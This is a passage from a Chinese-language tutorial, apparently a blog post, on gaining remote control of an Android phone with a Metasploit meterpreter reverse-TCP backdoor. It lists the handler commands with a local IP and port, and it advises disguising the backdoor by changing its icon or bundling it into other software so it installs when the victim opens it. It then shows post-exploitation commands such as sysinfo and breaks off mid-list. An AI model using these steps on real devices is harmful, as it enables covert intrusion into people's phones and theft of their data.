use exploit/multi/handler (选择模块)
set payload android/meterpreter/reverse_tcp (选择攻击模块)
set LhOST 192.168.249.130 (本地ip)
set lport 5555 (端口)
![](https://img-blog.csdnimg.cn/b7e46f4a57074a0881dca659a3b8b110.png)
参数配置完成,查看配置
show options
![](https://img-blog.csdnimg.cn/7e2b22ace6494e4bb0f413ae821feae8.png)
exploit 运行
6.在靶机运行后门程序
![](https://img-blog.csdnimg.cn/56492a2125374818a91343d8dd12e67f.png)
我们可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
四、命令执行
1.查看对方手机系统信息
命令 sysinfo
![](https://img-blog.csdnimg.cn/222636e795e44dfb804b8ed1a67d9e91.png)
2.查看对方手机安装哪些app文